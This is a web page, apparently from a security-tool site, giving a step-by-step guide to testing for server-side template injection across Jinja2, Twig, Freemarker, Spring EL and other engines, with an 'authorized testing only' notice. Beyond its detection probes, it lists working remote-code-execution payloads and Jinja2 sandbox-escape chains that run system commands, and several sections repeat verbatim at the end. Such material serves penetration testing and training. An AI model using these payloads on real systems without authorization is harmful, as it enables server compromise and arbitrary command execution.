Home GuidesSSTI Testing Guide

SSTI Testing Guide

Step-by-step guide to testing for Server-Side Template Injection across Jinja2, Twig, Freemarker, and other template engines with detection and exploitation techniques.

Advanced

6 steps23 payload examples~60 min

Authorized testing only. Only use these techniques on systems you have explicit permission to test.

Identify potential injection points

Look for user input that is reflected in rendered pages, especially in custom error messages, email templates, CMS content, and any feature that processes templates. Test parameters that control page content or layout.

Example payloads

name=testuser123

template=custom

message=Hello {{user}}

Detect template injection with polyglot probes

Submit mathematical expressions in template syntax. If the server evaluates them, template injection exists. Use a detection polyglot that works across multiple engines.

Example payloads

{{7*7}} (Jinja2, Twig)

${7*7} (Freemarker, EL)

#{7*7} (Ruby ERB, Thymeleaf)

<%= 7*7 %> (ERB)

${{7*7}} (Angular, Jinja2)

{{7*'7'}} (Twig: 49, Jinja2: 7777777)

Identify the template engine

Use engine-specific syntax to fingerprint the template engine. Each engine has unique behavior for certain expressions, helping you narrow down the exact engine and version.

Example payloads

{{config}} (Jinja2 leaks Flask config)

{{self}} (Jinja2)

{{_self.env.display("id")}} (Twig)

${T(java.lang.Runtime)} (Spring EL)

#{T(java.lang.Runtime)} (Thymeleaf)

Attempt code execution

Based on the identified engine, use known RCE payloads to execute system commands. Most template engines have a path from template injection to arbitrary code execution.

Example payloads

{{config.__class__.__init__.__globals__['os'].popen('id').read()}} (Jinja2)

<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} (Freemarker)

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} (Twig)

Bypass sandbox restrictions

If the template engine has a sandbox, try to escape it. Use Python MRO chain traversal for Jinja2, or alternative classes and methods that are not blocked.

Example payloads

{{"".__class__.__mro__[1].__subclasses__()}} (list available classes)

{{lipsum.__globals__["os"].popen("id").read()}} (Jinja2 alt)

{{request.__class__.__mro__[1].__subclasses__()[300]("id",shell=True,stdout=-1).communicate()}}

Document findings

Record the template engine, injection point, exploitation chain, and achievable impact. SSTI typically leads to RCE, making it a critical vulnerability.

Example payloads

Template Engine: Jinja2 2.11

Injection Point: name parameter in /profile

Impact: Remote Code Execution as www-data

Related Resources

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

$loading...

Detect template injection with polyglot probes

Submit mathematical expressions in template syntax. If the server evaluates them, template injection exists. Use a detection polyglot that works across multiple engines.

Example payloads

{{7*7}} (Jinja2, Twig)

${7*7} (Freemarker, EL)

#{7*7} (Ruby ERB, Thymeleaf)

<%= 7*7 %> (ERB)

${{7*7}} (Angular, Jinja2)

{{7*'7'}} (Twig: 49, Jinja2: 7777777)

Identify the template engine

Use engine-specific syntax to fingerprint the template engine. Each engine has unique behavior for certain expressions, helping you narrow down the exact engine and version.

Example payloads

{{config}} (Jinja2 leaks Flask config)

{{self}} (Jinja2)

{{_self.env.display("id")}} (Twig)

${T(java.lang.Runtime)} (Spring EL)

#{T(java.lang.Runtime)} (Thymeleaf)

Attempt code execution

Based on the identified engine, use known RCE payloads to execute system commands. Most template engines have a path from template injection to arbitrary code execution.

Example payloads

{{config.__class__.__init__.__globals__['os'].popen('id').read()}} (Jinja2)

<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} (Freemarker)

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} (Twig)

Bypass sandbox restrictions

If the template engine has a sandbox, try to escape it. Use Python MRO chain traversal for Jinja2, or alternative classes and methods that are not blocked.

Example payloads

{{"".__class__.__mro__[1].__subclasses__()}} (list available classes)

{{lipsum.__globals__["os"].popen("id").read()}} (Jinja2 alt)

{{request.__class__.__mro__[1].__subclasses__()[300]("id",shell=True,stdout=-1).communicate()}}